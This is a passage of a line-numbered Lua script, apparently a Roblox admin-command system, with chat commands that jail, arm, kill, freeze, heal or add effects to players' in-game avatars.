  1889. 633.game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1890.  
  1891.  
  1892. 634.v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1893.  
  1894.  
  1895. 635.v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1896.  
  1897.  
  1898. 636.end)
  1899.  
  1900.  
  1901. 637.local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1902.  
  1903.  
  1904. 638.local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1905.  
  1906.  
  1907. 639.local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1908.  
  1909.  
  1910. 640.local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1911.  
  1912.  
  1913. 641.local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1914.  
  1915.  
  1916. 642.local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1917.  
  1918.  
  1919. 643.local msh2 = msh:Clone() msh2.Parent = back
  1920.  
  1921.  
  1922. 644.local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1923.  
  1924.  
  1925. 645.local msh4 = msh3:Clone() msh4.Parent = left
  1926.  
  1927.  
  1928. 646.v.Character.Torso.CFrame = cf
  1929.  
  1930.  
  1931. 647.end
  1932.  
  1933.  
  1934. 648.end))
  1935.  
  1936.  
  1937. 649.end
  1938.  
  1939.  
  1940. 650.end
  1941.  
  1942.  
  1943. 651.
  1944.  
  1945.  
  1946. 652.if msg:lower():sub(1,7) == "unjail " then
  1947.  
  1948.  
  1949. 653.local plrz = GetPlr(plr, msg:lower():sub(8))
  1950.  
  1951.  
  1952. 654.for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1953.  
  1954.  
  1955. 655.end
  1956.  
  1957.  
  1958. 656.
  1959.  
  1960.  
  1961. 657.if msg:lower():sub(1,11) == "starttools " then
  1962.  
  1963.  
  1964. 658.local plrz = GetPlr(plr, msg:lower():sub(12))
  1965.  
  1966.  
  1967. 659.for i, v in pairs(plrz) do
  1968.  
  1969.  
  1970. 660.coroutine.resume(coroutine.create(function()
  1971.  
  1972.  
  1973. 661.if v and v:findFirstChild("Backpack") then
  1974.  
  1975.  
  1976. 662.for a,q in pairs(game.StarterPack:children()) do q:Clone().Parent = v.Backpack end
  1977.  
  1978.  
  1979. 663.end
  1980.  
  1981.  
  1982. 664.end))
  1983.  
  1984.  
  1985. 665.end
  1986.  
  1987.  
  1988. 666.end
  1989.  
  1990.  
  1991. 667.
  1992.  
  1993.  
  1994. 668.if msg:lower():sub(1,6) == "sword " then
  1995.  
  1996.  
  1997. 669.local plrz = GetPlr(plr, msg:lower():sub(7))
  1998.  
  1999.  
  2000. 670.for i, v in pairs(plrz) do
  2001.  
  2002.  
  2003. 671.coroutine.resume(coroutine.create(function()
  2004.  
  2005.  
  2006. 672.if v and v:findFirstChild("Backpack") then
  2007.  
  2008.  
  2009. 673.local sword = Instance.new("Tool", v.Backpack) sword.Name = "Sword" sword.TextureId = "rbxasset://Textures/Sword128.png"
  2010.  
  2011.  
  2012. 674.sword.GripForward = Vector3.new(-1,0,0)
  2013.  
  2014.  
  2015. 675.sword.GripPos = Vector3.new(0,0,-1.5)
  2016.  
  2017.  
  2018. 676.sword.GripRight = Vector3.new(0,1,0)
  2019.  
  2020.  
  2021. 677.sword.GripUp = Vector3.new(0,0,1)
  2022.  
  2023.  
  2024. 678.local handle = Instance.new("Part", sword) handle.Name = "Handle" handle.FormFactor = "Plate" handle.Size = Vector3.new(1,.8,4) handle.TopSurface = 0 handle.BottomSurface = 0
  2025.  
  2026.  
  2027. 679.local msh = Instance.new("SpecialMesh", handle) msh.MeshId = "rbxasset://fonts/sword.mesh" msh.TextureId = "rbxasset://textures/SwordTexture.png"
  2028.  
  2029.  
  2030. 680.local cl = script.LocalScriptBase:Clone() cl.Parent = sword cl.Code.Value = [[
  2031.  
  2032.  
  2033. 681.repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")
  2034.  
  2035.  
  2036. 682.local Damage = 15
  2037.  
  2038.  
  2039. 683.local SlashSound = Instance.new("Sound", script.Parent.Handle)
  2040.  
  2041.  
  2042. 684.SlashSound.SoundId = "rbxasset://sounds\\swordslash.wav"
  2043.  
  2044.  
  2045. 685.SlashSound.Volume = 1
  2046.  
  2047.  
  2048. 686.local LungeSound = Instance.new("Sound", script.Parent.Handle)
  2049.  
  2050.  
  2051. 687.LungeSound.SoundId = "rbxasset://sounds\\swordlunge.wav"
  2052.  
  2053.  
  2054. 688.LungeSound.Volume = 1
  2055.  
  2056.  
  2057. 689.local UnsheathSound = Instance.new("Sound", script.Parent.Handle)
  2058.  
  2059.  
  2060. 690.UnsheathSound.SoundId = "rbxasset://sounds\\unsheath.wav"
  2061.  
  2062.  
  2063. 691.UnsheathSound.Volume = 1
  2064.  
  2065.  
  2066. 692.local last = 0
  2067.  
  2068.  
  2069. 693.script.Parent.Handle.Touched:connect(function(hit)
  2070.  
  2071.  
  2072. 694.if hit and hit.Parent and hit.Parent:findFirstChild("Humanoid") and game.Players:findFirstChild(hit.Parent.Name) and game.Players.LocalPlayer.Character.Humanoid.Health > 0 and hit.Parent.Humanoid ~= game.Players.LocalPlayer.Character.Humanoid then
  2073.  
  2074.  
  2075. 695.local tag = Instance.new("ObjectValue", hit.Parent.Humanoid) tag.Value = plr1 tag.Name = "creator" game:service("Debris"):AddItem(tag, 3)
  2076.  
  2077.  
  2078. 696.hit.Parent.Humanoid:TakeDamage(Damage)
  2079.  
  2080.  
  2081. 697.end
  2082.  
  2083.  
  2084. 698.end)
  2085.  
  2086.  
  2087. 699.script.Parent.Activated:connect(function()
  2088.  
  2089.  
  2090. 700.if not script.Parent.Enabled or game.Players.LocalPlayer.Character.Humanoid.Health <= 0 then return end
  2091.  
  2092.  
  2093. 701.script.Parent.Enabled = false
  2094.  
  2095.  
  2096. 702.local tick = game:service("RunService").Stepped:wait()
  2097.  
  2098.  
  2099. 703.if tick - last <= .2 then
  2100.  
  2101.  
  2102. 704.LungeSound:play()
  2103.  
  2104.  
  2105. 705.local lunge = Instance.new("StringValue", script.Parent) lunge.Name = "toolanim" lunge.Value = "Lunge"
  2106.  
  2107.  
  2108. 706.local frc = Instance.new("BodyVelocity", game.Players.LocalPlayer.Character.Torso) frc.Name = "SwordForce" frc.velocity = Vector3.new(0,10,0)
  2109.  
  2110.  
  2111. 707.wait(.2)
  2112.  
  2113.  
  2114. 708.script.Parent.GripForward = Vector3.new(0,0,1)
  2115.  
  2116.  
  2117. 709.script.Parent.GripRight = Vector3.new(0,-1,0)
  2118.  
  2119.  
  2120. 710.script.Parent.GripUp = Vector3.new(-1,0,0)
  2121.  
  2122.  
  2123. 711.wait(.3)
  2124.  
  2125.  
  2126. 712.frc:Destroy() wait(.5)
  2127.  
  2128.  
  2129. 713.script.Parent.GripForward = Vector3.new(-1,0,0)
  2130.  
  2131.  
  2132. 714.script.Parent.GripRight = Vector3.new(0,1,0)
  2133.  
  2134.  
  2135. 715.script.Parent.GripUp = Vector3.new(0,0,1)
  2136.  
  2137.  
  2138. 716.else
  2139.  
  2140.  
  2141. 717.SlashSound:play()
  2142.  
  2143.  
  2144. 718.local slash = Instance.new("StringValue", script.Parent) slash.Name = "toolanim" slash.Value = "Slash"
  2145.  
  2146.  
  2147. 719.end
  2148.  
  2149.  
  2150. 720.last = tick
  2151.  
  2152.  
  2153. 721.script.Parent.Enabled = true
  2154.  
  2155.  
  2156. 722.end)
  2157.  
  2158.  
  2159. 723.script.Parent.Equipped:connect(function(mouse)
  2160.  
  2161.  
  2162. 724.for i,v in pairs(game.Players.LocalPlayer.Character.Torso:children()) do if v.Name == "SwordForce" then v:Destroy() end end
  2163.  
  2164.  
  2165. 725.UnsheathSound:play()
  2166.  
  2167.  
  2168. 726.script.Parent.Enabled = true
  2169.  
  2170.  
  2171. 727.if not mouse then return end
  2172.  
  2173.  
  2174. 728.mouse.Icon = "http://www.roblox.com/asset/?id=103593352"
  2175.  
  2176.  
  2177. 729.end)]] cl.Disabled = false
  2178.  
  2179.  
  2180. 730.end
  2181.  
  2182.  
  2183. 731.end))
  2184.  
  2185.  
  2186. 732.end
  2187.  
  2188.  
  2189. 733.end
  2190.  
  2191.  
  2192. 734.
  2193.  
  2194.  
  2195. 735.if msg:lower():sub(1,5) == "kill " then
  2196.  
  2197.  
  2198. 736.local plrz = GetPlr(plr, msg:lower():sub(6))
  2199.  
  2200.  
  2201. 737.for i, v in pairs(plrz) do
  2202.  
  2203.  
  2204. 738.coroutine.resume(coroutine.create(function()
  2205.  
  2206.  
  2207. 739.if v and v.Character then v.Character:BreakJoints() end
  2208.  
  2209.  
  2210. 740.end))
  2211.  
  2212.  
  2213. 741.end
  2214.  
  2215.  
  2216. 742.end
  2217.  
  2218.  
  2219. 743.
  2220.  
  2221.  
  2222. 744.if msg:lower():sub(1,8) == "respawn " then
  2223.  
  2224.  
  2225. 745.local plrz = GetPlr(plr, msg:lower():sub(9))
  2226.  
  2227.  
  2228. 746.for i, v in pairs(plrz) do
  2229.  
  2230.  
  2231. 747.coroutine.resume(coroutine.create(function()
  2232.  
  2233.  
  2234. 748.if v and v.Character then v:LoadCharacter() end
  2235.  
  2236.  
  2237. 749.end))
  2238.  
  2239.  
  2240. 750.end
  2241.  
  2242.  
  2243. 751.end
  2244.  
  2245.  
  2246. 752.
  2247.  
  2248.  
  2249. 753.if msg:lower():sub(1,5) == "trip " then
  2250.  
  2251.  
  2252. 754.local plrz = GetPlr(plr, msg:lower():sub(6))
  2253.  
  2254.  
  2255. 755.for i, v in pairs(plrz) do
  2256.  
  2257.  
  2258. 756.coroutine.resume(coroutine.create(function()
  2259.  
  2260.  
  2261. 757.if v and v.Character and v.Character:findFirstChild("Torso") then
  2262.  
  2263.  
  2264. 758.v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  2265.  
  2266.  
  2267. 759.end
  2268.  
  2269.  
  2270. 760.end))
  2271.  
  2272.  
  2273. 761.end
  2274.  
  2275.  
  2276. 762.end
  2277.  
  2278.  
  2279. 763.
  2280.  
  2281.  
  2282. 764.if msg:lower():sub(1,5) == "stun " then
  2283.  
  2284.  
  2285. 765.local plrz = GetPlr(plr, msg:lower():sub(6))
  2286.  
  2287.  
  2288. 766.for i, v in pairs(plrz) do
  2289.  
  2290.  
  2291. 767.coroutine.resume(coroutine.create(function()
  2292.  
  2293.  
  2294. 768.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2295.  
  2296.  
  2297. 769.v.Character.Humanoid.PlatformStand = true
  2298.  
  2299.  
  2300. 770.end
  2301.  
  2302.  
  2303. 771.end))
  2304.  
  2305.  
  2306. 772.end
  2307.  
  2308.  
  2309. 773.end
  2310.  
  2311.  
  2312. 774.
  2313.  
  2314.  
  2315. 775.if msg:lower():sub(1,7) == "unstun " then
  2316.  
  2317.  
  2318. 776.local plrz = GetPlr(plr, msg:lower():sub(8))
  2319.  
  2320.  
  2321. 777.for i, v in pairs(plrz) do
  2322.  
  2323.  
  2324. 778.coroutine.resume(coroutine.create(function()
  2325.  
  2326.  
  2327. 779.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2328.  
  2329.  
  2330. 780.v.Character.Humanoid.PlatformStand = false
  2331.  
  2332.  
  2333. 781.end
  2334.  
  2335.  
  2336. 782.end))
  2337.  
  2338.  
  2339. 783.end
  2340.  
  2341.  
  2342. 784.end
  2343.  
  2344.  
  2345. 785.
  2346.  
  2347.  
  2348. 786.if msg:lower():sub(1,5) == "jump " then
  2349.  
  2350.  
  2351. 787.local plrz = GetPlr(plr, msg:lower():sub(6))
  2352.  
  2353.  
  2354. 788.for i, v in pairs(plrz) do
  2355.  
  2356.  
  2357. 789.coroutine.resume(coroutine.create(function()
  2358.  
  2359.  
  2360. 790.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2361.  
  2362.  
  2363. 791.v.Character.Humanoid.Jump = true
  2364.  
  2365.  
  2366. 792.end
  2367.  
  2368.  
  2369. 793.end))
  2370.  
  2371.  
  2372. 794.end
  2373.  
  2374.  
  2375. 795.end
  2376.  
  2377.  
  2378. 796.
  2379.  
  2380.  
  2381. 797.if msg:lower():sub(1,4) == "sit " then
  2382.  
  2383.  
  2384. 798.local plrz = GetPlr(plr, msg:lower():sub(5))
  2385.  
  2386.  
  2387. 799.for i, v in pairs(plrz) do
  2388.  
  2389.  
  2390. 800.coroutine.resume(coroutine.create(function()
  2391.  
  2392.  
  2393. 801.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2394.  
  2395.  
  2396. 802.v.Character.Humanoid.Sit = true
  2397.  
  2398.  
  2399. 803.end
  2400.  
  2401.  
  2402. 804.end))
  2403.  
  2404.  
  2405. 805.end
  2406.  
  2407.  
  2408. 806.end
  2409.  
  2410.  
  2411. 807.
  2412.  
  2413.  
  2414. 808.if msg:lower():sub(1,10) == "invisible " then
  2415.  
  2416.  
  2417. 809.local plrz = GetPlr(plr, msg:lower():sub(11))
  2418.  
  2419.  
  2420. 810.for i, v in pairs(plrz) do
  2421.  
  2422.  
  2423. 811.coroutine.resume(coroutine.create(function()
  2424.  
  2425.  
  2426. 812.if v and v.Character then
  2427.  
  2428.  
  2429. 813.for a, obj in pairs(v.Character:children()) do
  2430.  
  2431.  
  2432. 814.if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  2433.  
  2434.  
  2435. 815.end
  2436.  
  2437.  
  2438. 816.end
  2439.  
  2440.  
  2441. 817.end))
  2442.  
  2443.  
  2444. 818.end
  2445.  
  2446.  
  2447. 819.end
  2448.  
  2449.  
  2450. 820.
  2451.  
  2452.  
  2453. 821.if msg:lower():sub(1,8) == "visible " then
  2454.  
  2455.  
  2456. 822.local plrz = GetPlr(plr, msg:lower():sub(9))
  2457.  
  2458.  
  2459. 823.for i, v in pairs(plrz) do
  2460.  
  2461.  
  2462. 824.coroutine.resume(coroutine.create(function()
  2463.  
  2464.  
  2465. 825.if v and v.Character then
  2466.  
  2467.  
  2468. 826.for a, obj in pairs(v.Character:children()) do
  2469.  
  2470.  
  2471. 827.if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  2472.  
  2473.  
  2474. 828.end
  2475.  
  2476.  
  2477. 829.end
  2478.  
  2479.  
  2480. 830.end))
  2481.  
  2482.  
  2483. 831.end
  2484.  
  2485.  
  2486. 832.end
  2487.  
  2488.  
  2489. 833.
  2490.  
  2491.  
  2492. 834.if msg:lower():sub(1,5) == "lock " then
  2493.  
  2494.  
  2495. 835.local plrz = GetPlr(plr, msg:lower():sub(6))
  2496.  
  2497.  
  2498. 836.for i, v in pairs(plrz) do
  2499.  
  2500.  
  2501. 837.coroutine.resume(coroutine.create(function()
  2502.  
  2503.  
  2504. 838.if v and v.Character then
  2505.  
  2506.  
  2507. 839.for a, obj in pairs(v.Character:children()) do
  2508.  
  2509.  
  2510. 840.if obj:IsA("BasePart") then obj.Locked = true elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Locked = true end
  2511.  
  2512.  
  2513. 841.end
  2514.  
  2515.  
  2516. 842.end
  2517.  
  2518.  
  2519. 843.end))
  2520.  
  2521.  
  2522. 844.end
  2523.  
  2524.  
  2525. 845.end
  2526.  
  2527.  
  2528. 846.
  2529.  
  2530.  
  2531. 847.if msg:lower():sub(1,7) == "unlock " then
  2532.  
  2533.  
  2534. 848.local plrz = GetPlr(plr, msg:lower():sub(8))
  2535.  
  2536.  
  2537. 849.for i, v in pairs(plrz) do
  2538.  
  2539.  
  2540. 850.coroutine.resume(coroutine.create(function()
  2541.  
  2542.  
  2543. 851.if v and v.Character then
  2544.  
  2545.  
  2546. 852.for a, obj in pairs(v.Character:children()) do
  2547.  
  2548.  
  2549. 853.if obj:IsA("BasePart") then obj.Locked = false elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Locked = false end
  2550.  
  2551.  
  2552. 854.end
  2553.  
  2554.  
  2555. 855.end
  2556.  
  2557.  
  2558. 856.end))
  2559.  
  2560.  
  2561. 857.end
  2562.  
  2563.  
  2564. 858.end
  2565.  
  2566.  
  2567. 859.
  2568.  
  2569.  
  2570. 860.if msg:lower():sub(1,8) == "explode " then
  2571.  
  2572.  
  2573. 861.local plrz = GetPlr(plr, msg:lower():sub(9))
  2574.  
  2575.  
  2576. 862.for i, v in pairs(plrz) do
  2577.  
  2578.  
  2579. 863.coroutine.resume(coroutine.create(function()
  2580.  
  2581.  
  2582. 864.if v and v.Character and v.Character:findFirstChild("Torso") then
  2583.  
  2584.  
  2585. 865.local ex = Instance.new("Explosion", game.Workspace) ex.Position = v.Character.Torso.Position
  2586.  
  2587.  
  2588. 866.end
  2589.  
  2590.  
  2591. 867.end))
  2592.  
  2593.  
  2594. 868.end
  2595.  
  2596.  
  2597. 869.end
  2598.  
  2599.  
  2600. 870.
  2601.  
  2602.  
  2603. 871.if msg:lower():sub(1,4) == "age " then
  2604.  
  2605.  
  2606. 872.local plrz = GetPlr(plr, msg:lower():sub(5))
  2607.  
  2608.  
  2609. 873.for i, v in pairs(plrz) do
  2610.  
  2611.  
  2612. 874.coroutine.resume(coroutine.create(function()
  2613.  
  2614.  
  2615. 875.if v then Message(v.Name .. "'s age", tostring(v.AccountAge), false, {plr}) end
  2616.  
  2617.  
  2618. 876.end))
  2619.  
  2620.  
  2621. 877.end
  2622.  
  2623.  
  2624. 878.end
  2625.  
  2626.  
  2627. 879.
  2628.  
  2629.  
  2630. 880.if msg:lower():sub(1,5) == "fire " then
  2631.  
  2632.  
  2633. 881.local plrz = GetPlr(plr, msg:lower():sub(6))
  2634.  
  2635.  
  2636. 882.for i, v in pairs(plrz) do
  2637.  
  2638.  
  2639. 883.coroutine.resume(coroutine.create(function()
  2640.  
  2641.  
  2642. 884.if v and v.Character and v.Character:findFirstChild("Torso") then
  2643.  
  2644.  
  2645. 885.local cl = Instance.new("Fire", v.Character.Torso) table.insert(objects, cl)
  2646.  
  2647.  
  2648. 886.end
  2649.  
  2650.  
  2651. 887.end))
  2652.  
  2653.  
  2654. 888.end
  2655.  
  2656.  
  2657. 889.end
  2658.  
  2659.  
  2660. 890.
  2661.  
  2662.  
  2663. 891.if msg:lower():sub(1,7) == "unfire " then
  2664.  
  2665.  
  2666. 892.local plrz = GetPlr(plr, msg:lower():sub(8))
  2667.  
  2668.  
  2669. 893.for i, v in pairs(plrz) do
  2670.  
  2671.  
  2672. 894.coroutine.resume(coroutine.create(function()
  2673.  
  2674.  
  2675. 895.if v and v.Character and v.Character:findFirstChild("Torso") then
  2676.  
  2677.  
  2678. 896.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  2679.  
  2680.  
  2681. 897.end
  2682.  
  2683.  
  2684. 898.end))
  2685.  
  2686.  
  2687. 899.end
  2688.  
  2689.  
  2690. 900.end
  2691.  
  2692.  
  2693. 901.
  2694.  
  2695.  
  2696. 902.if msg:lower():sub(1,6) == "smoke " then
  2697.  
  2698.  
  2699. 903.local plrz = GetPlr(plr, msg:lower():sub(7))
  2700.  
  2701.  
  2702. 904.for i, v in pairs(plrz) do
  2703.  
  2704.  
  2705. 905.coroutine.resume(coroutine.create(function()
  2706.  
  2707.  
  2708. 906.if v and v.Character and v.Character:findFirstChild("Torso") then
  2709.  
  2710.  
  2711. 907.local cl = Instance.new("Smoke", v.Character.Torso) table.insert(objects, cl)
  2712.  
  2713.  
  2714. 908.end
  2715.  
  2716.  
  2717. 909.end))
  2718.  
  2719.  
  2720. 910.end
  2721.  
  2722.  
  2723. 911.end
  2724.  
  2725.  
  2726. 912.
  2727.  
  2728.  
  2729. 913.if msg:lower():sub(1,8) == "unsmoke " then
  2730.  
  2731.  
  2732. 914.local plrz = GetPlr(plr, msg:lower():sub(9))
  2733.  
  2734.  
  2735. 915.for i, v in pairs(plrz) do
  2736.  
  2737.  
  2738. 916.coroutine.resume(coroutine.create(function()
  2739.  
  2740.  
  2741. 917.if v and v.Character and v.Character:findFirstChild("Torso") then
  2742.  
  2743.  
  2744. 918.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  2745.  
  2746.  
  2747. 919.end
  2748.  
  2749.  
  2750. 920.end))
  2751.  
  2752.  
  2753. 921.end
  2754.  
  2755.  
  2756. 922.end
  2757.  
  2758.  
  2759. 923.
  2760.  
  2761.  
  2762. 924.if msg:lower():sub(1,9) == "sparkles " then
  2763.  
  2764.  
  2765. 925.local plrz = GetPlr(plr, msg:lower():sub(10))
  2766.  
  2767.  
  2768. 926.for i, v in pairs(plrz) do
  2769.  
  2770.  
  2771. 927.coroutine.resume(coroutine.create(function()
  2772.  
  2773.  
  2774. 928.if v and v.Character and v.Character:findFirstChild("Torso") then
  2775.  
  2776.  
  2777. 929.local cl = Instance.new("Sparkles", v.Character.Torso) table.insert(objects, cl)
  2778.  
  2779.  
  2780. 930.end
  2781.  
  2782.  
  2783. 931.end))
  2784.  
  2785.  
  2786. 932.end
  2787.  
  2788.  
  2789. 933.end
  2790.  
  2791.  
  2792. 934.
  2793.  
  2794.  
  2795. 935.if msg:lower():sub(1,11) == "unsparkles " then
  2796.  
  2797.  
  2798. 936.local plrz = GetPlr(plr, msg:lower():sub(12))
  2799.  
  2800.  
  2801. 937.for i, v in pairs(plrz) do
  2802.  
  2803.  
  2804. 938.coroutine.resume(coroutine.create(function()
  2805.  
  2806.  
  2807. 939.if v and v.Character and v.Character:findFirstChild("Torso") then
  2808.  
  2809.  
  2810. 940.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  2811.  
  2812.  
  2813. 941.end
  2814.  
  2815.  
  2816. 942.end))
  2817.  
  2818.  
  2819. 943.end
  2820.  
  2821.  
  2822. 944.end
  2823.  
  2824.  
  2825. 945.
  2826.  
  2827.  
  2828. 946.if msg:lower():sub(1,3) == "ff " then
  2829.  
  2830.  
  2831. 947.local plrz = GetPlr(plr, msg:lower():sub(4))
  2832.  
  2833.  
  2834. 948.for i, v in pairs(plrz) do
  2835.  
  2836.  
  2837. 949.coroutine.resume(coroutine.create(function()
  2838.  
  2839.  
  2840. 950.if v and v.Character then Instance.new("ForceField", v.Character) end
  2841.  
  2842.  
  2843. 951.end))
  2844.  
  2845.  
  2846. 952.end
  2847.  
  2848.  
  2849. 953.end
  2850.  
  2851.  
  2852. 954.
  2853.  
  2854.  
  2855. 955.if msg:lower():sub(1,5) == "unff " then
  2856.  
  2857.  
  2858. 956.local plrz = GetPlr(plr, msg:lower():sub(6))
  2859.  
  2860.  
  2861. 957.for i, v in pairs(plrz) do
  2862.  
  2863.  
  2864. 958.coroutine.resume(coroutine.create(function()
  2865.  
  2866.  
  2867. 959.if v and v.Character then
  2868.  
  2869.  
  2870. 960.for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  2871.  
  2872.  
  2873. 961.end
  2874.  
  2875.  
  2876. 962.end))
  2877.  
  2878.  
  2879. 963.end
  2880.  
  2881.  
  2882. 964.end
  2883.  
  2884.  
  2885. 965.
  2886.  
  2887.  
  2888. 966.if msg:lower():sub(1,7) == "punish " then
  2889.  
  2890.  
  2891. 967.local plrz = GetPlr(plr, msg:lower():sub(8))
  2892.  
  2893.  
  2894. 968.for i, v in pairs(plrz) do
  2895.  
  2896.  
  2897. 969.coroutine.resume(coroutine.create(function()
  2898.  
  2899.  
  2900. 970.if v and v.Character then
  2901.  
  2902.  
  2903. 971.v.Character.Parent = game:service("Lighting")
  2904.  
  2905.  
  2906. 972.end
  2907.  
  2908.  
  2909. 973.end))
  2910.  
  2911.  
  2912. 974.end
  2913.  
  2914.  
  2915. 975.end
  2916.  
  2917.  
  2918. 976.
  2919.  
  2920.  
  2921. 977.if msg:lower():sub(1,9) == "unpunish " then
  2922.  
  2923.  
  2924. 978.local plrz = GetPlr(plr, msg:lower():sub(10))
  2925.  
  2926.  
  2927. 979.for i, v in pairs(plrz) do
  2928.  
  2929.  
  2930. 980.coroutine.resume(coroutine.create(function()
  2931.  
  2932.  
  2933. 981.if v and v.Character then
  2934.  
  2935.  
  2936. 982.v.Character.Parent = game:service("Workspace")
  2937.  
  2938.  
  2939. 983.v.Character:MakeJoints()
  2940.  
  2941.  
  2942. 984.end
  2943.  
  2944.  
  2945. 985.end))
  2946.  
  2947.  
  2948. 986.end
  2949.  
  2950.  
  2951. 987.end
  2952.  
  2953.  
  2954. 988.
  2955.  
  2956.  
  2957. 989.if msg:lower():sub(1,7) == "freeze " then
  2958.  
  2959.  
  2960. 990.local plrz = GetPlr(plr, msg:lower():sub(8))
  2961.  
  2962.  
  2963. 991.for i, v in pairs(plrz) do
  2964.  
  2965.  
  2966. 992.coroutine.resume(coroutine.create(function()
  2967.  
  2968.  
  2969. 993.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  2970.  
  2971.  
  2972. 994.for a, obj in pairs(v.Character:children()) do
  2973.  
  2974.  
  2975. 995.if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  2976.  
  2977.  
  2978. 996.end
  2979.  
  2980.  
  2981. 997.end
  2982.  
  2983.  
  2984. 998.end))
  2985.  
  2986.  
  2987. 999.end
  2988.  
  2989.  
  2990. 1000.end
  2991.  
  2992.  
  2993. 1001.
  2994.  
  2995.  
  2996. 1002.if msg:lower():sub(1,5) == "thaw " then
  2997.  
  2998.  
  2999. 1003.local plrz = GetPlr(plr, msg:lower():sub(6))
  3000.  
  3001.  
  3002. 1004.for i, v in pairs(plrz) do
  3003.  
  3004.  
  3005. 1005.coroutine.resume(coroutine.create(function()
  3006.  
  3007.  
  3008. 1006.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3009.  
  3010.  
  3011. 1007.for a, obj in pairs(v.Character:children()) do
  3012.  
  3013.  
  3014. 1008.if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  3015.  
  3016.  
  3017. 1009.end
  3018.  
  3019.  
  3020. 1010.end
  3021.  
  3022.  
  3023. 1011.end))
  3024.  
  3025.  
  3026. 1012.end
  3027.  
  3028.  
  3029. 1013.end
  3030.  
  3031.  
  3032. 1014.
  3033.  
  3034.  
  3035. 1015.if msg:lower():sub(1,5) == "heal " then
  3036.  
  3037.  
  3038. 1016.local plrz = GetPlr(plr, msg:lower():sub(6))
  3039.  
  3040.  
  3041. 1017.for i, v in pairs(plrz) do
  3042.  
  3043.  
  3044. 1018.coroutine.resume(coroutine.create(function()
  3045.  
  3046.  
  3047. 1019.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3048.  
  3049.  
  3050. 1020.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  3051.  
  3052.  
  3053. 1021.end
  3054.  
  3055.  
  3056. 1022.end))
  3057.  
  3058.  
  3059. 1023.end
  3060.  
  3061.  
  3062. 1024.end
  3063.  
  3064.  
  3065. 1025.
  3066.  
  3067.  
  3068. 1026.if msg:lower():sub(1,4) == "god " then
  3069.  
  3070.  
  3071. 1027.local plrz = GetPlr(plr, msg:lower():sub(5))
  3072.  
  3073.  
  3074. 1028.for i, v in pairs(plrz) do
  3075.  
  3076.  
  3077. 1029.coroutine.resume(coroutine.create(function()
  3078.  
  3079.  
  3080. 1030.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3081.  
  3082.  
  3083. 1031.v.Character.Humanoid.MaxHealth = math.huge
  3084.  
  3085.  
  3086. 1032.v.Character.Humanoid.Health = 9e9
  3087.  
  3088.  
  3089. 1033.end
  3090.  
  3091.  
  3092. 1034.end))
  3093.  
  3094.  
  3095. 1035.end
  3096.  
  3097.  
  3098. 1036.end
  3099.  
  3100.  
  3101. 1037.
  3102.  
  3103.  
  3104. 1038.if msg:lower():sub(1,6) == "ungod " then
  3105.  
  3106.  
  3107. 1039.local plrz = GetPlr(plr, msg:lower():sub(7))
  3108.  
  3109.  
  3110. 1040.for i, v in pairs(plrz) do
  3111.  
  3112.  
  3113. 1041.coroutine.resume(coroutine.create(function()
  3114.  
  3115.  
  3116. 1042.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3117.  
  3118.  
  3119. 1043.v.Character.Humanoid.MaxHealth = 100
  3120.  
  3121.  
  3122. 1044.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  3123.  
  3124.  
  3125. 1045.end
  3126.  
  3127.  
  3128. 1046.end))
  3129.  
  3130.  
  3131. 1047.end
  3132.  
  3133.  
  3134. 1048.end
  3135.  
  3136.  
  3137. 1049.
  3138.  
  3139.  
  3140. 1050.if msg:lower():sub(1,8) == "ambient " then
  3141.  
  3142.  
